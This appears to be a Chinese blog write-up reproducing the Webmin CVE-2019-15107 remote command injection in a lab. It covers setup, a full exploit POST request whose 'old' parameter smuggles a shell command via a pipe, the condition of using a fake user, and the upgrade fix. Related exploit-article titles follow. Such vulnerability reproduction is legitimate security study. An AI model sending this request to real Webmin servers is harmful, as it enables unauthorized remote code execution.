0X1 漏洞概述

Webmin的是一个用于管理类Unix的系统的管理配置工具,具有网络页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。

影响版本

Webmin  <= 1.920 

0X2 环境搭建

根据最新消息,该应用在官方提供的sourceforge下载的源码才包含这个漏洞,而官方Github上的代码是安全的。这也证明这个RCE漏洞很有可能是一次供应链攻击,黑客控制了官方sourceforge账户并植入了后门。在sourceforge上下载,链接如下

https://sourceforge.net/projects/webadmin/files/webmin/1.920/

在这里,我们下载deb安装包,在ubuntu16.04中安装,如下:

如果报错,按照提示更新系统就可以了。安装成功之后,以root账户身份登录即可。

https://192.167.0.217:10000/sysinfo.cgi?xnavigation=1

登录之后点击authentication修改密码重置配置

查看配置文件

cat /etc/webmin/miniserv.conf

0X3 漏洞利用

访问/password_change.cgi链接,抓包注入命令

POST  /password_change.cgi HTTP/1.1
Host: 192.167.0.217:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: redirect=1; testing=1; sid=2c97114272115f9e3e52307ff418b31d; sessiontest=1
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 60user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

这里的user值要是用的是一个假的用户,使用真实的root测试不成功,只有在发送的用户参数的值不是已知的Linux用户的情况下(而参考链接中是user=root123),展示进入才会到修改/etc/shadow的地方,触发命令注入漏洞

查看response

可以看到命令执行成功!

0X3 漏洞修复

升级到最新的1.9.30版本即可

参考链接

http://www.webmin.com/index.html

https://www.exploit-db.com/exploits/47230

https://blog.firosolutions.com/exploits/webmin/

https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107/README.zh-cn.md

CVE-2019-15107 Webmin远程命令执行漏洞复现相关推荐

  1. PHPMailer远程命令执行漏洞复现

    ​PHPMailer远程命令执行漏洞复现 一.漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, ...

  2. 华为路由器远程命令执行漏洞复现(CVE-2017-17215)

    华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...

  3. webmin远程命令执行漏洞(cve-2019-15107)深入分析

    漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件. Webmin是目前功能最强大的基于Web的Unix系统管理工具.管理员通过浏览器访问Webmin的 ...

  4. 开源堡垒机JumpServer远程命令执行漏洞复现

    声明 好好学习,天天向上 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统.JumpServer 使用Python ...

  5. Dlink路由器 CNVD-2018-01084 远程命令执行漏洞 复现分析

    Dlink路由器 CNVD-2018-01084复现分析 0x01 背景介绍 D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞.该漏洞是由于service ...

  6. Apache[多后缀文件名解析漏洞+换行解析漏洞+SSI远程命令执行漏洞]复现

    目录 一.多后缀文件解析漏洞 二.Apache换行解析漏洞(CVE-2017-15715) 三.Apache SSI 远程命令执行漏洞

  7. HFS远程命令执行漏洞复现

    漏洞程序下载地址:Http File Server 这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题.再Window ...

  8. Apache Solr Velocity 注入远程命令执行漏洞复现 (CVE-2019-17558)

    漏洞描述 Solr是Apache Lucene项目的开源企业搜索平台. 其主要功能包括全文检索.命中标示.分面搜索.动态聚类.数据库集成,以及富文本的处理. 2019年10月30日,国外安全研究人员放 ...

  9. thinkphp5.*远程命令执行漏洞复现

    ThinkPHP5漏洞复现: 测试版本:ThinkPHP_full_v5.0.22 远程执行命令漏洞: 首先工具检测漏洞是否存在: 远程执行命令,wireshark抓包: 直接得到poc: http: ...

最新文章

  1. HashSet的使用
  2. Working with multiple environments
  3. Unity3D游戏开发之使用SVN对Unity进行版本控制
  4. layuiAdmin打开新窗口、新标签页
  5. 「每天一道面试题」String和StringBuilder、StringBuffer的区别
  6. lucene4.7 高亮功能(八)
  7. static 静态局部变量
  8. Android 第一行代码
  9. paper 63 :函数比较:imfilter与fspecial
  10. 2021-09-03相同的树
  11. ABTess之AA 测试
  12. 简述autocad在测绘工程中的应用_AutoCAD在工程测绘制图中的应用
  13. 为什么宁愿工资低点,也不建议去外包公司?
  14. 读July关于概率论所想
  15. pdf添加水印的方法,pdf加水印步骤
  16. 广东电大计算机绘图试题,2014年电大计算机绘图期末复习试题及答案参考小抄.doc...
  17. Elasticsearch Ingest-Attachment
  18. MATLAB中的偏最小二乘回归(PLSR)和主成分回归(PCR)
  19. 同步六进制加法计数电路(D触发器)
  20. 去除IntelliJ IDEA中重复代码报灰黄色的下划波浪线

热门文章

  1. Adobe illustrator 抽丝剥茧选中多个点 - 连载 13
  2. guid怎么做到唯一_怎么做成为一个好女人呢?
  3. 提高篇 第三部分 图论 第4章 差分约束系统
  4. oracle监听服务无法启动不了,关于ORACLE监听服务无法启动的问题
  5. 论文公式编号右对齐_公式对齐(二):公式居中,编号右对齐(MathType 6.9)
  6. 正确的python变量名_在Python,如何将变量名作为字符串?_others_酷徒编程知识库...
  7. 平面设计师okr_设计团队如何推进OKR实现设计赋能
  8. excel批量更改超链接_批量新建Excel指定名称工作表并设置超链接!你,学会了吗?...
  9. Java笔记-Spring Boot中Spring WS WS-Addressing中@Action实例
  10. Qt笔记-解决Q3DScatter加载QCustom3DItem时Cannot open the file问题